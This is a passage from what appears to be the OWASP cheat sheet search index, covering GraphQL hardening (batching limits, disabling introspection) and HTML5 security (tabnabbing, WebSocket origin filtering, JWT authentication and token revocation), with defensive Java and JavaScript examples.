One option is to create a code-level rate limit on how many objects callers can request. This means the backend would track how many different object instances the caller has requested, so that they will be blocked after requesting too many objects, even if they batch the object requests in a single network call. This replicates the network-level rate limit that a WAF or other tool would provide.

Another option is to prevent batching for sensitive objects that you don't want to be brute forced, such as usernames, emails, passwords, OTPs, session tokens, etc. This way an attacker is forced to attack the API like a REST API and make a different network call per object instance. This is not supported natively, so it will require a custom solution. However, once this control is in place, other standard controls will function normally to help prevent any brute forcing.

Limiting the number of operations that can be batched and run at once is another option to mitigate GraphQL batching attacks leading to DoS. This is not a silver bullet though and should be used in conjunction with other methods.
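
The snippet below is a minimal sketch of the last option, rejecting request bodies that batch more than a fixed number of operations; it assumes the JSON array batching format shown above and uses Jackson for parsing, and the class name and limit are illustrative assumptions:

import com.fasterxml.jackson.databind.JsonNode;\nimport com.fasterxml.jackson.databind.ObjectMapper;\n\npublic class BatchLimitValidator {\n\nprivate static final int MAX_BATCHED_OPERATIONS = 5; //Illustrative limit\n\nprivate static final ObjectMapper MAPPER = new ObjectMapper();\n\n/**\n * Reject incoming GraphQL requests that batch more operations than allowed\n */\npublic static void validate(String requestBody) throws Exception {\nJsonNode root = MAPPER.readTree(requestBody);\nif (root.isArray() && root.size() > MAX_BATCHED_OPERATIONS) {\nthrow new IllegalArgumentException(\"Too many batched operations in a single request !\");\n}\n}\n}\n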

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#secure-configurations","title":"Secure Configurations","text":"

By default, most GraphQL implementations have some insecure default configurations which should be changed:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#introspection-graphiql","title":"Introspection + GraphiQL","text":"

GraphQL often comes by default with introspection and/or GraphiQL enabled and not requiring authentication. This allows the consumer of your API to learn everything about your API, schemas, mutations, deprecated fields, and sometimes unwanted \"private fields\".

This might be an intended configuration if your API is designed to be consumed by external clients, but it can also be an issue if the API was designed to be used internally only. Although security by obscurity is not recommended, it might be a good idea to consider removing introspection to avoid any leaks. If your API is publicly consumed, you might want to consider disabling it for unauthenticated or unauthorized users.

For internal APIs, the easiest approach is to just disable introspection system-wide. See this page or consult your GraphQL implementation's documentation to learn how to disable introspection altogether. If your implementation does not natively support disabling introspection or if you would like to allow some consumers/roles to have this access, you can build a filter in your service to only allow approved consumers to access the introspection system.

Keep in mind that even if introspection is disabled, attackers can still guess fields by brute forcing them. Furthermore, GraphQL has a built-in feature to return a hint when a field name that the requester provides is similar (but incorrect) to an existing field (e.g. the request has usr and the response will ask Did you mean \"user\"?). You should consider disabling this feature if you have disabled introspection in order to decrease the exposure, but not all implementations of GraphQL support doing so. Shapeshifter is one tool that should be able to do this.

Disable Introspection - Java

GraphQLSchema schema = GraphQLSchema.newSchema()\n.query(StarWarsSchema.queryType)\n.fieldVisibility( NoIntrospectionGraphqlFieldVisibility.NO_INTROSPECTION_FIELD_VISIBILITY )\n.build();\n

Disable Introspection & GraphiQL - JavaScript

app.use('/graphql', graphqlHTTP({\nschema: MySessionAwareGraphQLSchema,\nvalidationRules: [NoIntrospection],\ngraphiql: process.env.NODE_ENV === 'development',\n}));\n
"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#dont-return-excessive-errors","title":"Don't Return Excessive Errors","text":"

GraphQL APIs in production shouldn't return stack traces or be in debug mode. Doing this is implementation specific, but using middleware is one popular way to have better control over the errors the server returns. To disable excessive errors with Apollo Server, either pass debug: false to the Apollo Server constructor or set the NODE_ENV environment variable to 'production' or 'test'. However, if you would like to log the stack trace internally without returning it to the user, see here for how to mask and log errors so they are available to the developers but not to callers of the API.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#other-resources","title":"Other Resources","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#tools","title":"Tools","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#graphql-security-best-practices-documentation","title":"GraphQL Security Best Practices + Documentation","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#more-on-graphql-attacks","title":"More on GraphQL Attacks","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html","title":"HTML5 Security Cheat Sheet","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The following cheat sheet serves as a guide for implementing HTML 5 in a secure fashion.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#communication-apis","title":"Communication APIs","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#web-messaging","title":"Web Messaging","text":"

Web Messaging (also known as Cross Domain Messaging) provides a means of messaging between documents from different origins in a way that is generally safer than the multiple hacks used in the past to accomplish this task. However, there are still some recommendations to keep in mind:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#cross-origin-resource-sharing","title":"Cross Origin Resource Sharing","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#websockets","title":"WebSockets","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#server-sent-events","title":"Server-Sent Events","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#storage-apis","title":"Storage APIs","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#local-storage","title":"Local Storage","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#client-side-databases","title":"Client-side databases","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#geolocation","title":"Geolocation","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#web-workers","title":"Web Workers","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing","title":"Tabnabbing","text":"

This attack is described in detail in this article.

To summarize, it's the capacity to act on the parent page's content or location from a newly opened page via the back link exposed by the opener JavaScript object instance.

It applies to an HTML link or a JavaScript window.open function using the target attribute/instruction to specify a loading location that does not replace the current location, leaving the current window/tab reachable from the newly opened page.

To prevent this issue, the following actions are available:

Cut the back link between the parent and the child pages:

As the behavior of the elements above differs between browsers, either use an HTML link or JavaScript to open a window (or tab), then use this configuration to maximize cross-browser support:

function openPopup(url, name, windowFeatures){\n//Open the popup and set the opener and referrer policy instruction\nvar newWindow = window.open(url, name, 'noopener,noreferrer,' + windowFeatures);\n//Reset the opener link\nnewWindow.opener = null;\n}\n

Compatibility matrix:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#sandboxed-frames","title":"Sandboxed frames","text":"

It is possible to have fine-grained control over iframe capabilities using the value of the sandbox attribute.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#credential-and-personally-identifiable-information-pii-input-hints","title":"Credential and Personally Identifiable Information (PII) Input hints","text":"

Consider accessing a financial account from a public computer. Even though the user logs off, the next person who uses the machine may be able to log in because of the browser's autocomplete functionality. To mitigate this, we tell the input fields not to assist in any way.

<input type=\"text\" spellcheck=\"false\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\"></input>\n

Text areas and input fields for PII (name, email, address, phone number) and login credentials (username, password) should be prevented from being stored in the browser. Use these HTML5 attributes to prevent the browser from storing PII from your form:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#offline-applications","title":"Offline Applications","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#progressive-enhancements-and-graceful-degradation-risks","title":"Progressive Enhancements and Graceful Degradation Risks","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#http-headers-to-enhance-security","title":"HTTP Headers to enhance security","text":"

Consult the OWASP Secure Headers project in order to obtain the list of HTTP security headers that an application should use to enable defenses at the browser level.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#websocket-implementation-hints","title":"WebSocket implementation hints","text":"

In addition to the elements mentioned above, this is the list of areas for which caution must be taken during the implementation.

The sections below propose implementation hints for each area and go along with an example application showing all the points described.

The complete source code of the example application is available here.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#access-filtering","title":"Access filtering","text":"

During the WebSocket channel initiation, the browser sends the Origin HTTP request header, which contains the source domain from which the handshake request was initiated. Even if this header can be spoofed in a forged HTTP request (not browser based), it cannot be overridden or forced in a browser context. It therefore represents a good candidate for applying filtering according to an expected value.

An example of an attack using this vector, named Cross-Site WebSocket Hijacking (CSWSH), is described here.

The code below defines a configuration that applies filtering based on an \"allow list\" of origins. This ensures that only allowed origins can establish a full handshake:

import org.owasp.encoder.Encode;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.server.ServerEndpointConfig;\nimport java.util.Arrays;\nimport java.util.List;\n\n/**\n * Setup handshake rules applied to all WebSocket endpoints of the application.\n * Use to setup the Access Filtering using \"Origin\" HTTP header as input information.\n *\n * @see \"http://docs.oracle.com/javaee/7/api/index.html?javax/websocket/server/\n * ServerEndpointConfig.Configurator.html\"\n * @see \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin\"\n */\npublic class EndpointConfigurator extends ServerEndpointConfig.Configurator {\n\n/**\n     * Logger\n     */\nprivate static final Logger LOG = LoggerFactory.getLogger(EndpointConfigurator.class);\n\n/**\n     * Get the expected source origins from a JVM property in order to allow external configuration\n     */\nprivate static final List<String> EXPECTED_ORIGINS =  Arrays.asList(System.getProperty(\"source.origins\")\n.split(\";\"));\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic boolean checkOrigin(String originHeaderValue) {\nboolean isAllowed = EXPECTED_ORIGINS.contains(originHeaderValue);\nString safeOriginValue = Encode.forHtmlContent(originHeaderValue);\nif (isAllowed) {\nLOG.info(\"[EndpointConfigurator] New handshake request received from {} and was accepted.\",\nsafeOriginValue);\n} else {\nLOG.warn(\"[EndpointConfigurator] New handshake request received from {} and was rejected !\",\nsafeOriginValue);\n}\nreturn isAllowed;\n}\n\n}\n
"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#authentication-and-inputoutput-validation","title":"Authentication and Input/Output validation","text":"

When using a WebSocket as the communication channel, it's important to use an authentication method that provides the user with an access token that is not automatically sent by the browser and must instead be explicitly sent by the client code during each exchange.

HMAC digests are the simplest method, and JSON Web Token is a good feature-rich alternative, because it allows the transport of access ticket information in a stateless and tamper-evident way. Moreover, it defines a validity timeframe. You can find additional information about JWT token hardening in this cheat sheet.

JSON validation schemas are used to define and validate the expected content of input and output messages.

The code below defines the complete authentication messages flow handling:

Authentication Web Socket endpoint - Provide a WS endpoint that enables authentication exchange

import org.owasp.pocwebsocket.configurator.EndpointConfigurator;\nimport org.owasp.pocwebsocket.decoder.AuthenticationRequestDecoder;\nimport org.owasp.pocwebsocket.encoder.AuthenticationResponseEncoder;\nimport org.owasp.pocwebsocket.handler.AuthenticationMessageHandler;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.CloseReason;\nimport javax.websocket.OnClose;\nimport javax.websocket.OnError;\nimport javax.websocket.OnOpen;\nimport javax.websocket.Session;\nimport javax.websocket.server.ServerEndpoint;\n\n/**\n * Class in charge of managing the client authentication.\n *\n * @see \"http://docs.oracle.com/javaee/7/api/javax/websocket/server/ServerEndpointConfig.Configurator.html\"\n * @see \"http://svn.apache.org/viewvc/tomcat/trunk/webapps/examples/WEB-INF/classes/websocket/\"\n */\n@ServerEndpoint(value = \"/auth\", configurator = EndpointConfigurator.class,\nsubprotocols = {\"authentication\"}, encoders = {AuthenticationResponseEncoder.class},\ndecoders = {AuthenticationRequestDecoder.class})\npublic class AuthenticationEndpoint {\n\n/**\n     * Logger\n     */\nprivate static final Logger LOG = LoggerFactory.getLogger(AuthenticationEndpoint.class);\n\n/**\n     * Handle the beginning of an exchange\n     *\n     * @param session Exchange session information\n     */\n@OnOpen\npublic void start(Session session) {\n//Define connection idle timeout and message limits in order to mitigate as much as possible\n//DOS attacks using massive connection opening or massive big messages sending\nint msgMaxSize = 1024 * 1024;//1 MB\nsession.setMaxIdleTimeout(60000);//1 minute\nsession.setMaxTextMessageBufferSize(msgMaxSize);\nsession.setMaxBinaryMessageBufferSize(msgMaxSize);\n//Log exchange start\nLOG.info(\"[AuthenticationEndpoint] Session {} started\", session.getId());\n//Affect a new message handler instance in order to process the exchange\nsession.addMessageHandler(new AuthenticationMessageHandler(session.getBasicRemote()));\nLOG.info(\"[AuthenticationEndpoint] Session {} message handler affected for processing\",\nsession.getId());\n}\n\n/**\n     * Handle error case\n     *\n     * @param session Exchange session information\n     * @param thr     Error details\n     */\n@OnError\npublic void onError(Session session, Throwable thr) {\nLOG.error(\"[AuthenticationEndpoint] Error occur in session {}\", session.getId(), thr);\n}\n\n/**\n     * Handle close event\n     *\n     * @param session     Exchange session information\n     * @param closeReason Exchange closing reason\n     */\n@OnClose\npublic void onClose(Session session, CloseReason closeReason) {\nLOG.info(\"[AuthenticationEndpoint] Session {} closed: {}\", session.getId(),\ncloseReason.getReasonPhrase());\n}\n\n}\n

Authentication message handler - Handle all authentication requests

import org.owasp.pocwebsocket.enumeration.AccessLevel;\nimport org.owasp.pocwebsocket.util.AuthenticationUtils;\nimport org.owasp.pocwebsocket.vo.AuthenticationRequest;\nimport org.owasp.pocwebsocket.vo.AuthenticationResponse;\nimport org.owasp.encoder.Encode;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.MessageHandler;\nimport javax.websocket.RemoteEndpoint;\nimport java.io.IOException;\n\n/**\n * Handle authentication message flow\n */\npublic class AuthenticationMessageHandler implements MessageHandler.Whole<AuthenticationRequest> {\n\nprivate static final Logger LOG = LoggerFactory.getLogger(AuthenticationMessageHandler.class);\n\n/**\n     * Reference to the communication channel with the client\n     */\nprivate RemoteEndpoint.Basic clientConnection;\n\n/**\n     * Constructor\n     *\n     * @param clientConnection Reference to the communication channel with the client\n     */\npublic AuthenticationMessageHandler(RemoteEndpoint.Basic clientConnection) {\nthis.clientConnection = clientConnection;\n}\n\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void onMessage(AuthenticationRequest message) {\nAuthenticationResponse response = null;\ntry {\n//Authenticate\nString authenticationToken = \"\";\nString accessLevel = this.authenticate(message.getLogin(), message.getPassword());\nif (accessLevel != null) {\n//Create a simple JSON token representing the authentication profile\nauthenticationToken = AuthenticationUtils.issueToken(message.getLogin(), accessLevel);\n}\n//Build the response object\nString safeLoginValue = Encode.forHtmlContent(message.getLogin());\nif (!authenticationToken.isEmpty()) {\nresponse = new AuthenticationResponse(true, authenticationToken, \"Authentication succeed !\");\nLOG.info(\"[AuthenticationMessageHandler] User {} authentication succeed.\", safeLoginValue);\n} else {\nresponse = new AuthenticationResponse(false, authenticationToken, \"Authentication failed !\");\nLOG.warn(\"[AuthenticationMessageHandler] User {} authentication failed.\", safeLoginValue);\n}\n} catch (Exception e) {\nLOG.error(\"[AuthenticationMessageHandler] Error occur in authentication process.\", e);\n//Build the response object indicating that authentication fail\nresponse = new AuthenticationResponse(false, \"\", \"Authentication failed !\");\n} finally {\n//Send response\ntry {\nthis.clientConnection.sendObject(response);\n} catch (IOException | EncodeException e) {\nLOG.error(\"[AuthenticationMessageHandler] Error occur in response object sending.\", e);\n}\n}\n}\n\n/**\n     * Authenticate the user\n     *\n     * @param login    User login\n     * @param password User password\n     * @return The access level if the authentication succeed or NULL if the authentication failed\n     */\nprivate String authenticate(String login, String password) {\n....\n}\n}\n

Utility class to manage the JWT token - Handles the issuing and the validation of the access token. A simple JWT token is used for the example (the focus here is on the overall WS endpoint implementation) without extra hardening (see this cheat sheet to apply extra hardening to the JWT token)

import com.auth0.jwt.JWT;\nimport com.auth0.jwt.JWTVerifier;\nimport com.auth0.jwt.algorithms.Algorithm;\nimport com.auth0.jwt.interfaces.DecodedJWT;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\nimport java.util.Calendar;\nimport java.util.Locale;\n\n/**\n * Utility class to manage the authentication JWT token\n */\npublic class AuthenticationUtils {\n\n/**\n     * Build a JWT token for a user\n     *\n     * @param login       User login\n     * @param accessLevel Access level of the user\n     * @return The Base64 encoded JWT token\n     * @throws Exception If any error occur during the issuing\n     */\npublic static String issueToken(String login, String accessLevel) throws Exception {\n//Issue a JWT token with validity of 30 minutes\nAlgorithm algorithm = Algorithm.HMAC256(loadSecret());\nCalendar c = Calendar.getInstance();\nc.add(Calendar.MINUTE, 30);\nreturn JWT.create().withIssuer(\"WEBSOCKET-SERVER\").withSubject(login).withExpiresAt(c.getTime())\n.withClaim(\"access_level\", accessLevel.trim().toUpperCase(Locale.US)).sign(algorithm);\n}\n\n/**\n     * Verify the validity of the provided JWT token\n     *\n     * @param token JWT token encoded to verify\n     * @return The verified and decoded token with user authentication and\n     * authorization (access level) information\n     * @throws Exception If any error occur during the token validation\n     */\npublic static DecodedJWT validateToken(String token) throws Exception {\nAlgorithm algorithm = Algorithm.HMAC256(loadSecret());\nJWTVerifier verifier = JWT.require(algorithm).withIssuer(\"WEBSOCKET-SERVER\").build();\nreturn verifier.verify(token);\n}\n\n/**\n     * Load the JWT secret used to sign token using a byte array for secret storage in order\n     * to avoid persistent string in memory\n     *\n     * @return The secret as byte array\n     * @throws IOException If any error occur during the secret loading\n     */\nprivate static byte[] loadSecret() throws IOException {\nreturn Files.readAllBytes(Paths.get(\"src\", \"main\", \"resources\", \"jwt-secret.txt\"));\n}\n}\n

JSON schema of the input and output authentication message - Define the expected structure of the input and output messages from the authentication endpoint point of view

{\n\"$schema\": \"http://json-schema.org/schema#\",\n\"title\": \"AuthenticationRequest\",\n\"type\": \"object\",\n\"properties\": {\n\"login\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z]{1,10}$\"\n},\n\"password\": {\n\"type\": \"string\"\n}\n},\n\"required\": [\n\"login\",\n\"password\"\n]\n}\n\n{\n\"$schema\": \"http://json-schema.org/schema#\",\n\"title\": \"AuthenticationResponse\",\n\"type\": \"object\",\n\"properties\": {\n\"isSuccess;\": {\n\"type\": \"boolean\"\n},\n\"token\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z0-9+/=\\\\._-]{0,500}$\"\n},\n\"message\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z0-9!\\\\s]{0,100}$\"\n}\n},\n\"required\": [\n\"isSuccess\",\n\"token\",\n\"message\"\n]\n}\n

Authentication message decoder and encoder - Perform the JSON serialization/deserialization and the input/output validation using dedicated JSON Schema. It makes it possible to systematically ensure that all messages received and sent by the endpoint strictly respect the expected structure and content.

import com.fasterxml.jackson.databind.JsonNode;\nimport com.github.fge.jackson.JsonLoader;\nimport com.github.fge.jsonschema.core.exceptions.ProcessingException;\nimport com.github.fge.jsonschema.core.report.ProcessingReport;\nimport com.github.fge.jsonschema.main.JsonSchema;\nimport com.github.fge.jsonschema.main.JsonSchemaFactory;\nimport com.google.gson.Gson;\nimport org.owasp.pocwebsocket.vo.AuthenticationRequest;\n\nimport javax.websocket.DecodeException;\nimport javax.websocket.Decoder;\nimport javax.websocket.EndpointConfig;\nimport java.io.File;\nimport java.io.IOException;\n\n/**\n * Decode JSON text representation to an AuthenticationRequest object\n * <p>\n * As there's one instance of the decoder class by endpoint session so we can use the\n * JsonSchema as decoder instance variable.\n */\npublic class AuthenticationRequestDecoder implements Decoder.Text<AuthenticationRequest> {\n\n/**\n     * JSON validation schema associated to this type of message\n     */\nprivate JsonSchema validationSchema = null;\n\n/**\n     * Initialize decoder and associated JSON validation schema\n     *\n     * @throws IOException If any error occur during the object creation\n     * @throws ProcessingException If any error occur during the schema loading\n     */\npublic AuthenticationRequestDecoder() throws IOException, ProcessingException {\nJsonNode node = JsonLoader.fromFile(\nnew File(\"src/main/resources/authentication-request-schema.json\"));\nthis.validationSchema = JsonSchemaFactory.byDefault().getJsonSchema(node);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic AuthenticationRequest decode(String s) throws DecodeException {\ntry {\n//Validate the provided representation against the dedicated schema\n//Use validation mode with report in order to enable further inspection/tracing\n//of the error details\n//Moreover the validation method \"validInstance()\" generate a NullPointerException\n//if the representation do not respect the expected schema\n//so it's more proper to use the validation method with report\nProcessingReport validationReport = this.validationSchema.validate(JsonLoader.fromString(s),\ntrue);\n//Ensure there no error\nif (!validationReport.isSuccess()) {\n//Simply reject the message here: Don't care about error details...\nthrow new DecodeException(s, \"Validation of the provided representation failed !\");\n}\n} catch (IOException | ProcessingException e) {\nthrow new DecodeException(s, \"Cannot validate the provided representation to a\"\n+ \" JSON valid representation !\", e);\n}\n\nreturn new Gson().fromJson(s, AuthenticationRequest.class);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic boolean willDecode(String s) {\nboolean canDecode = false;\n\n//If the provided JSON representation is empty/null then we indicate that\n//representation cannot be decoded to our expected object\nif (s == null || s.trim().isEmpty()) {\nreturn canDecode;\n}\n\n//Try to cast the provided JSON representation to our object to validate at least\n//the structure (content validation is done during decoding)\ntry {\nAuthenticationRequest test = new Gson().fromJson(s, AuthenticationRequest.class);\ncanDecode = (test != null);\n} catch (Exception e) {\n//Ignore explicitly any casting error...\n}\n\nreturn canDecode;\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void init(EndpointConfig config) {\n//Not used\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void destroy() {\n//Not used\n}\n}\n
import com.fasterxml.jackson.databind.JsonNode;\nimport com.github.fge.jackson.JsonLoader;\nimport com.github.fge.jsonschema.core.exceptions.ProcessingException;\nimport com.github.fge.jsonschema.core.report.ProcessingReport;\nimport com.github.fge.jsonschema.main.JsonSchema;\nimport com.github.fge.jsonschema.main.JsonSchemaFactory;\nimport com.google.gson.Gson;\nimport org.owasp.pocwebsocket.vo.AuthenticationResponse;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.Encoder;\nimport javax.websocket.EndpointConfig;\nimport java.io.File;\nimport java.io.IOException;\n\n/**\n * Encode AuthenticationResponse object to JSON text representation.\n * <p>\n * As there one instance of the encoder class by endpoint session so we can use\n * the JsonSchema as encoder instance variable.\n */\npublic class AuthenticationResponseEncoder implements Encoder.Text<AuthenticationResponse> {\n\n/**\n     * JSON validation schema associated to this type of message\n     */\nprivate JsonSchema validationSchema = null;\n\n/**\n     * Initialize encoder and associated JSON validation schema\n     *\n     * @throws IOException If any error occur during the object creation\n     * @throws ProcessingException If any error occur during the schema loading\n     */\npublic AuthenticationResponseEncoder() throws IOException, ProcessingException {\nJsonNode node = JsonLoader.fromFile(\nnew File(\"src/main/resources/authentication-response-schema.json\"));\nthis.validationSchema = JsonSchemaFactory.byDefault().getJsonSchema(node);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic String encode(AuthenticationResponse object) throws EncodeException {\n//Generate the JSON representation\nString json = new Gson().toJson(object);\ntry {\n//Validate the generated representation against the dedicated schema\n//Use validation mode with report in order to enable further inspection/tracing\n//of the error details\n//Moreover the validation method \"validInstance()\" generate a NullPointerException\n//if the representation do not respect the expected schema\n//so it's more proper to use the validation method with report\nProcessingReport validationReport = this.validationSchema.validate(JsonLoader.fromString(json),\ntrue);\n//Ensure there no error\nif (!validationReport.isSuccess()) {\n//Simply reject the message here: Don't care about error details...\nthrow new EncodeException(object, \"Validation of the generated representation failed !\");\n}\n} catch (IOException | ProcessingException e) {\nthrow new EncodeException(object, \"Cannot validate the generated representation to a\"+\n\" JSON valid representation !\", e);\n}\n\nreturn json;\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void init(EndpointConfig config) {\n//Not used\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void destroy() {\n//Not used\n}\n\n}\n

Note that the same approach is used in the message handling part of the POC. All messages exchanged between the client and the server are systematically validated in the same way, using dedicated JSON schemas linked to message-dedicated Encoders/Decoders (serialization/deserialization).

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#authorization-and-access-token-explicit-invalidation","title":"Authorization and access token explicit invalidation","text":"

Authorization information is stored in the access token using the JWT Claim feature (in the POC the name of the claim is access_level). Authorization is validated when a request is received and before any other action using the user input information.

The access token is passed with every message sent to the message endpoint and a block list is used in order to allow the user to request an explicit token invalidation.

Explicit token invalidation is interesting from a user's point of view because, when tokens are used, the validity timeframe of the token is often relatively long (it's common to see a validity timeframe longer than 1 hour), so it's important to give the user a way to tell the system \"OK, I have finished my exchange with you, so you can close our exchange session and clean up the associated links\".

It also allows users to revoke their own current access if they detect malicious concurrent access using the same token (the case of token theft).

Token block list - Maintains a temporary, in-memory, time-limited cache of the hashes of tokens that are no longer allowed to be used

import org.apache.commons.jcs.JCS;\nimport org.apache.commons.jcs.access.CacheAccess;\nimport org.apache.commons.jcs.access.exception.CacheException;\n\nimport javax.xml.bind.DatatypeConverter;\nimport java.security.MessageDigest;\nimport java.security.NoSuchAlgorithmException;\n\n/**\n * Utility class to manage the access token that have been declared as no\n * more usable (explicit user logout)\n */\npublic class AccessTokenBlocklistUtils {\n/**\n     * Message content send by user that indicate that the access token that\n     * come along the message must be block-listed for further usage\n     */\npublic static final String MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG = \"INVALIDATE_TOKEN\";\n\n/**\n     * Use cache to store block-listed token hash in order to avoid memory exhaustion and be consistent\n     * because token are valid 30 minutes so the item live in cache 60 minutes\n     */\nprivate static final CacheAccess<String, String> TOKEN_CACHE;\n\nstatic {\ntry {\nTOKEN_CACHE = JCS.getInstance(\"default\");\n} catch (CacheException e) {\nthrow new RuntimeException(\"Cannot init token cache !\", e);\n}\n}\n\n/**\n     * Add token into the block list\n     *\n     * @param token Token for which the hash must be added\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\npublic static void addToken(String token) throws NoSuchAlgorithmException {\nif (token != null && !token.trim().isEmpty()) {\nString hashHex = computeHash(token);\nif (TOKEN_CACHE.get(hashHex) == null) {\nTOKEN_CACHE.putSafe(hashHex, hashHex);\n}\n}\n}\n\n/**\n     * Check if a token is present in the block list\n     *\n     * @param token Token for which the presence of the hash must be verified\n     * @return TRUE if token is block-listed\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\npublic static boolean isBlocklisted(String token) throws NoSuchAlgorithmException {\nboolean exists = false;\nif (token != null && !token.trim().isEmpty()) {\nString hashHex = computeHash(token);\nexists = (TOKEN_CACHE.get(hashHex) != null);\n}\nreturn exists;\n}\n\n/**\n     * Compute the SHA256 hash of a token\n     *\n     * @param token Token for which the hash must be computed\n     * @return The hash encoded in HEX\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\nprivate static String computeHash(String token) throws NoSuchAlgorithmException {\nString hashHex = null;\nif (token != null && !token.trim().isEmpty()) {\nMessageDigest md = MessageDigest.getInstance(\"SHA-256\");\nbyte[] hash = md.digest(token.getBytes());\nhashHex = DatatypeConverter.printHexBinary(hash);\n}\nreturn hashHex;\n}\n\n}\n

Message handling - Processes a request from a user to add a message to the list. Shows an example of an authorization validation approach

import com.auth0.jwt.interfaces.Claim;\nimport com.auth0.jwt.interfaces.DecodedJWT;\nimport org.owasp.pocwebsocket.enumeration.AccessLevel;\nimport org.owasp.pocwebsocket.util.AccessTokenBlocklistUtils;\nimport org.owasp.pocwebsocket.util.AuthenticationUtils;\nimport org.owasp.pocwebsocket.util.MessageUtils;\nimport org.owasp.pocwebsocket.vo.MessageRequest;\nimport org.owasp.pocwebsocket.vo.MessageResponse;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.RemoteEndpoint;\nimport java.io.IOException;\nimport java.util.ArrayList;\nimport java.util.List;\n\n/**\n * Handle message flow\n */\npublic class MessageHandler implements javax.websocket.MessageHandler.Whole<MessageRequest> {\n\nprivate static final Logger LOG = LoggerFactory.getLogger(MessageHandler.class);\n\n/**\n     * Reference to the communication channel with the client\n     */\nprivate RemoteEndpoint.Basic clientConnection;\n\n/**\n     * Constructor\n     *\n     * @param clientConnection Reference to the communication channel with the client\n     */\npublic MessageHandler(RemoteEndpoint.Basic clientConnection) {\nthis.clientConnection = clientConnection;\n}\n\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void onMessage(MessageRequest message) {\nMessageResponse response = null;\ntry {\n/*Step 1: Verify the token*/\nString token = message.getToken();\n//Verify if is it in the block list\nif (AccessTokenBlocklistUtils.isBlocklisted(token)) {\nthrow new IllegalAccessException(\"Token is in the block list !\");\n}\n\n//Verify the signature of the token\nDecodedJWT decodedToken = AuthenticationUtils.validateToken(token);\n\n/*Step 2: Verify the authorization (access level)*/\nClaim accessLevel = decodedToken.getClaim(\"access_level\");\nif (accessLevel == null || AccessLevel.valueOf(accessLevel.asString()) == null) {\nthrow new IllegalAccessException(\"Token have an invalid access level claim !\");\n}\n\n/*Step 3: Do the expected processing*/\n//Init the list of the messages for the current user\nif (!MessageUtils.MESSAGES_DB.containsKey(decodedToken.getSubject())) {\nMessageUtils.MESSAGES_DB.put(decodedToken.getSubject(), new ArrayList<>());\n}\n\n//Add message to the list of message of the user if the message is a not a token invalidation\n//order otherwise add the token to the block list\nif (AccessTokenBlocklistUtils.MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG\n.equalsIgnoreCase(message.getContent().trim())) {\nAccessTokenBlocklistUtils.addToken(message.getToken());\n} else {\nMessageUtils.MESSAGES_DB.get(decodedToken.getSubject()).add(message.getContent());\n}\n\n//According to the access level of user either return only is message or return all message\nList<String> messages = new ArrayList<>();\nif (accessLevel.asString().equals(AccessLevel.USER.name())) {\nMessageUtils.MESSAGES_DB.get(decodedToken.getSubject())\n.forEach(s -> messages.add(String.format(\"(%s): %s\", decodedToken.getSubject(), s)));\n} else if (accessLevel.asString().equals(AccessLevel.ADMIN.name())) {\nMessageUtils.MESSAGES_DB.forEach((k, v) 